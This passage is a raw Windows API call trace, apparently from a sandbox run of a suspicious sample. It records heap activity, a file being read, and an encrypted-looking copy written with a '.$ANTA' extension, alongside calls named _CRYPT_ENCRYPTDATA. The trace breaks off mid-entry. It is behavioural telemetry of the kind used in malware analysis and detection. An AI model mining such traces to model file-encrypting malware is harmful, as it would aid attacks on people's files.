RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0128.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369e20 [0128.925] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0128.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0128.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0128.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0128.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0128.925] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\-ibxuw5BT.mp4.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\-ibxuw5bt.mp4.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0128.926] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0128.926] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0128.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0128.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0128.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0128.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0128.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0128.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b83020 [0128.930] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0128.930] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x8d0a, lpOverlapped=0x0) returned 1 [0128.932] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0128.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0128.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0128.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0128.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8d0a) returned 0x49aa010 [0128.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b83020 | out: hHeap=0x1780000) returned 1 [0128.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0128.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0128.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0128.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0128.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0128.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8d0a) returned 0x49b2d28 [0128.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0128.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.937] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0128.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0128.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0128.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0128.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0128.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0128.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8d0a) returned 0x49aa010 [0128.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0128.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0128.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0128.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0128.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0128.937] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0128.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0128.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0128.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0128.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0128.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0128.938] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0128.938] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0128.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0128.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2790 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8d0a) returned 0x49aa010 [0128.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27a0 [0128.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0128.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0128.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28f0 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0128.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac28 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8d0a) returned 0x49bba40 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0128.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0128.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0128.940] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0128.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0128.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0128.940] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0128.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0128.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0128.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0128.941] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0128.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0128.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0128.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0128.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0128.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0128.942] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0128.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0128.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0128.942] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0128.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0128.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0128.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0128.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0128.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0128.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0128.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0128.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0128.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0128.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0128.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0128.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0128.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0128.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0128.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0128.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0128.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0128.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0128.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0128.943] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0128.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0128.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0128.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0128.944] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0128.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf40 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0128.944] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0128.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0128.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0128.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0128.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0128.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0128.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0128.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0128.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0128.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0128.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0128.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0128.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0128.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 